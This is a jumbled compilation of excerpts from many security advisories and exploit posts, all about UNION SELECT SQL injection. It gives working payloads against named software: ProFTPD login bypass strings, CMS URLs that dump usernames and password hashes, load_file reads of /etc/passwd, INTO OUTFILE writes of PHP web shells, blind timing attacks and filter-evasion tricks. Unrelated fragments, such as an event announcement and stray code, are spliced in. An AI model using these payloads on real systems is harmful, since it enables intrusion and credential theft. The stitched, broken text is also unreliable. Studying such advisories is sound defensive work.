UNION
The 'forum' variable is taken from the $_POST[] array and inserted into a SQL query without
prior sanitization and without being surrounded by quotes.
You can then subsequently manipulate this query in /modules/forum/class/class.permissions.php by passing
another 'UNION SELECT' as the first argument of the 'UNION SELECT' passed to post.php
(a little bit complex uh? $forum_id is user controlled ...)
100-102:
...
if ($user_id > 0) {
Looks like a very serious issue to me - it works on our ProFTPD
1.3.2rc2 Server (latest stable on gentoo).
220 ProFTPD 1.3.2rc2 Server (Pumpkin) [xx.xx.xx.xx]
USER %') and 1=2 union select
1,0x24312452565a583533784324716a304d4d6b4670426b4b486177644264756634392f,uid,gid,homedir,shell
from ftp #
331 Password required for %')
PASS 1
230 User %') and 1=2 union select
5- [User] can see all the database information via SQL injection.
5.1- Some exploits are:
~~~~~~~~~~~~~~~~5.1.1 Exploits~~~~~~~~~~~~~~~~~~~~~~~~
---See all users
http://[HC URL]/accounts/accountmanager.asp?iconwebsite=&search=1&sortaction=1&sortfield=name union select Name,FullName,Description,AdminLevel From Admin_List where 1=1 order by name
---AdminProp
http://[HC URL]/accounts/accountmanager.asp?iconwebsite=&search=1&sortaction=1&sortfield=name union select propname,adminname,propvalue,propname From Adminprop where 1=1 order by name
---SQL SERVER
http://[HC URL]/accounts/accountmanager.asp?iconwebsite=&search=1&sortaction=1&sortfield=name union select Databasename,Owner,Loginname,Servername From SQLServer where 1=1 order by name
---IISPasswords
A) Multiple Remote Command Execution
http://site/path/admin/uploadItem.php?image=.; ;
http://site/path/admin/removeItemResponse.php?ItemID=.; ping localhost ;
http://site/path/admin/removeCategoryResponse.php?CategoryID=-1' UNION SELECT '; ping localhost ;'%23
B) Multiple SQL Injection
http://site/path/description.php?II=-1' UNION SELECT 1,2,3,4,5,6,7%23&UID=VALID UID HERE
As you can see in the above code taken from /libs/link.php @ lines
200-209 the "id" variable is never sanitized before being used in a
query. The result is a highly exploitable SQL Injection vulnerability.
md5=d41d8cd98f00b204e9800998ecf8427e&id=-99 UNION SELECT 1,2,3,null,5,
6,concat(user_login,char(58),user_pass),8,9 FROM pligg_users -- /*
By sending a POST request to vote.php with the above data, an attacker
can expose user credentials. There are still more SQL
injection issues in Pligg; next we will have a look at trackback.php
http://www.php.net/manual/en/features.http-auth.php
Manual PoC: visit http://host/path_to_geeklog/webservices/atom/index.php
then type:
username: ' AND 0 UNION SELECT 3,MD5('AAAA'),null,2 FROM gl_users LIMIT 1/*
password: AAAA
The authentication mechanism is bypassed!
Note that it is passed base64_encode()'d!
IV. SAMPLE CODE
_______________
A) Multiple SQL Injection
http://site/path/index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version
http://site/path/index.php?option=com_amblog&task=article&articleid=-1 UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users
http://site/path/index.php?option=com_amblog&task=newform&catid=-1 UNION SELECT 1,CONCAT(username,0x3a,password) FROM jos_users
> Just found out a problem with proftpd's sql authentication. The problem is easily reproducible if you login with username like:
Could you please provide the version number which is affected by this?
Running ProFTPD Version: 1.3.0 (stable) on Linux (Debian etch) I cannot
reproduce your report.
> USER %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; --
>
> and a password of "1" (without quotes).
>
> which leads to a successful login. Different account logins can be made successful using the limit clause (e.g. appending "LIMIT 5,1" will log you in as the 5th account in the users table).
>
In this way an attacker is able to ask boolean questions of the database and retrieve
the needed information bit by bit, a classic example of blind SQL injection.
If there are no active torrents in the database, then the induced SQL error method can be used.
http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>1,(SELECT 1 UNION ALL SELECT 1),2)=(SELECT+1
"Subquery returns more than 1 row"
http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>50,(SELECT 1 UNION ALL SELECT 1),2)=(SELECT+1
of the database, including user logins and passwords of the WordPress
installation, allowing him to obtain access to the application and
gain administration privileges.
For the SQL injection vulnerability, it is possible to concatenate other
SQL statements via a "UNION SELECT" clause. The parameters "search_max"
and "forum" are affected by this flaw.
Snippet of vulnerable code:
In wpf.class file:
Example
*******
http://OSSIM-SERVER/ossim/repository/repository_document.php?id_document=-3
union select 1,2,user(),4,5,6--&maximized=1&search_bylink=&pag=1
1.2 SQL injections in repository
The attacker needs to be authorized in the system for this to succeed.
- [A] Multiple SQL Injection
http://www.site.com/path/index.php?n=guest&c=0&m=forum&s=1&forum_id=-1'
UNION ALL SELECT 1,2,CONCAT(nick, 0x3a, pwd),4,5,6,7,8 FROM
com_users%23
http://www.site.com/path/index.php?n=guest&c=0&m=forum&s=2&forum_id=0&topic_id=-1'
UNION ALL SELECT GROUP_CONCAT(CONCAT(nick, 0x3a, pwd)) FROM
com_users%23
Use Internet Explorer (IE) for best results.
Note: "'" is used to bypass any SQL injection filter.
3.1. SQL Injection in "/utils/getXsl.aspx" in "xslIdn" parameter.
-------------
http://[URL]/utils/getXsl.aspx?xslIdn=-1' union' all' select 'UsrNam%2bUsrPwd' from' [Usr]
Open the downloaded file with Notepad.
-------------
3.2. SQL Injection in "/utils/getXml.aspx" in "part" parameter.
-------------
http://[URL]/utils/getXml.aspx?lnkIdn=-1&part=1 from' 'lnk' 'where' 1='2187 'union' all' 'select' 'UsrNam%2bUsrPwd' from' [Usr]' 'union' all' select' data1'
POST /PSF/index.php?page=authentification HTTP/1.1\r\n
Host: localhost\r\n
Connection: keep-alive\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: <SIZE>\r\n\r\n
username=8%27+union+select+CHR%2856%29%2CCHR%2857%29%2CCHR%2857%29
%2CCHR%2857%29+FROM+psf_administrator-----------&password=9&page=a
uthentification&button=Log+in\r\n\r\n
The SQL query will look like this:
select * from psf_administrator WHERE username='8\\\\\\\\\\\\\\\'
Example: (Will extract the database user)
1) Delay=5224.3877
Curl.exe -k "https://www.???.com:8443/login.php3" --cookie
"PLESKSESSID=1' union select if
(substring(user,1,1)=char(97),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3
from mysql.user/*"
2) Delay=5165.3031
Curl.exe -k "https://www.???.com:8443/login.php3" --cookie
A) Multiple SQL Injection
The following sample code has no requirements.
http://site/path/topics.php?action=ShowComment&id=-1 UNION SELECT 1,2,3,4,5,6,7%23
The following sample codes require that magic_quotes_gpc
is set to Off:
http://site/path/pages.php?id=-1' UNION SELECT 1,2,3,4,1,6,7,1%23
For DBMSs that support unbalanced C-style comments, data can, for example,
be retrieved from the database as follows:
$ ./sql_inject.sh 73aaafec4a8db27af49c4c43bca4ac13 user@example.com \
"*/) UNION SELECT random(),'NULL',
('result::'||ItmFirstname||':'||ItmSurname) FROM ContactItem"
Joe:Plumber
John:Doe
Agent:Smith
Web: http://www.andreafabrizi.it
Vuln: Multiple SQL-Injection Vulnerabilities
**************************************************************
########## EXAMPLE 1 ##########
roland@hp6720s:~$ echo -n "' union select userid,pass from core_user
-- " | base64
JyB1bmlvbiBzZWxlY3QgdXNlcmlkLHBhc3MgZnJvbSBjb3JlX3VzZXIgLS0g
-> http://localhost/docebo/doceboLms/index.php?modname=faq&op=play&mode=help&word=JyB1bmlvbiBzZWxlY3QgdXNlcmlkLHBhc3MgZnJvbSBjb3JlX3VzZXIgLS0g
###############################
[+] Code
- [A] Multiple SQL Injection
http://www.site.com/path/addressbook.php?letter=-1%25' UNION ALL
SELECT 1,2,NULL,username,5,password,email FROM fcms_users%23
http://www.site.com/path/recipes.php?category=1&id=1 UNION SELECT
1,2,username,password,5,6 FROM fcms_users
A) Multiple SQL Injection
The solution adopted consists of transforming the query
string to uppercase and checking for the existence of the
words UNION and SELECT. But by using C-style comments in
the query string, it is possible to bypass the filter.
Example:
SELECT becomes SE/**/LE/**/CT
UNION becomes UN/**/ION
[+] Code
- [A] Multiple Blind SQL Injection
http://site/path/inc/attach.php?id=-1' UNION ALL SELECT '<?php
system($_GET[cmd])%3b ?>',2,3,4,5,6,7,8 INTO OUTFILE
'/var/www/htdocs/path/rce.php'%23
http://site/path/index.php?do=profile&user=blabla&box=-1' UNION ALL
SELECT '<?php system($_GET[cmd])%3b ?>',2,3,4,5,6,7,8 INTO OUTFILE
http://www.site.com/path/config.inc
- [B] Authentication Bypass
Username: -1' UNION ALL SELECT 'password', 1, 'Administrator' FROM users%23
Password: password
- [C] Multiple SQL Injection
Using a cookie editor it is possible to edit that cookie
and manage the query, as follows:
Name: blogmanuserid
Content: -1' UNION ALL SELECT
1,CONCAT(UserName,char(58),UserPassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16
FROM user#
Server: target_server (example: localhost)
Path: /blogman/
Mark Stanislav - mark.stanislav@gmail.com
I. DESCRIPTION
---------------------------------------
A vulnerability exists in the search.php code that allows for SQL injection of various parameters. By assembling portions of SQL code between the affected parameters, successful SQL injection into the software can occur. In the testing done, various 'UNION SELECT' SQL injections can occur.
II. AFFECTED VERSIONS
---------------------------------------
< 6.0.1; < 5.1.51 ; < 5.0.81
IV. SAMPLE CODE
_______________
A) Multiple SQL Injection
index.php?option=com_artforms&task=ferforms&viewform=1 UNION SELECT 1,2,3,4,5,6%23
index.php?option=com_artforms&task=vferforms&id=1 UNION SELECT 1,2,3,4,5,6%23
index.php?option=com_artforms&task=tferforms&viewform=1 UNION SELECT 1,2,3,4,5,6%23
B) Directory Traversal
else $wq = " aid='$arcID' ";
$querystring = "select * from `#@__feedback` where $wq and ischeck='1' order by dtime desc";
$dlist->Init();
$dlist->SetSource($querystring);
...
# http://site.com/[PATH]/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''=
#===========================================================
#################################################################
# Securitylab Security Research Team
###################################################################
{
$this->fatal_error( "..." );
return false;
}

if ( preg_match( "#[^_a-zA-Z]union[^_a-zA-Z]#s", $_tmp ) )
{
$this->fatal_error( "..." );
return false;
}
else if ( preg_match_all( "#[^_a-zA-Z](select)[^_a-zA-Z]#s", $_tmp, $matches ) )
Greetings,
The Spanish Ministry for Science and Innovation presents in Madrid
from 14th – 18th April, and during the Spanish Presidency of the
European Union, Campus Party Europe
(http://www.campus-party.eu/home-en.html) : a special edition of what
is considered the biggest event for technology, creativity and digital
culture online in the world.
For four days, 800 young people from each of the 27 member states of
Poc/Exploit:
~~~~~~~~~~
http://www.target.com/index.php?module=pnEncyclopedia&func=display_term&id=9999 union select 1,2,3,4,5,6,version(),8,9,10,11--
http://www.target.com/index.php?module=pnEncyclopedia&func=display_term&id=9999 union select 1,2,3,4,5,6,load_file(0x2f6574632f706173737764),8,9,10,11--
http://www.target.com/index.php?module=pnEncyclopedia&func=display_term&id=9999 union select 1,2,3,4,5,6,concat(pn_uname,0x3a,pn_pass),8,9,10,11 from nuke_users limit 1,1--
Dork:
~~~~~
$hash="";
#RESULTING QUERY
#SELECT * FROM nuke_banner_clients WHERE login='a' UNION SELECT 0,0,0,0,0,0, IF((ASCII(SUBSTRING(`pwd`,1,1))=112),benchmark(200000000,CHAR(0)),'falso') FROM nuke_authors WHERE `radminsuper`=1/*
for ($i=1;$i<33;$i++)
{
for ($j=0;$j<16;$j++)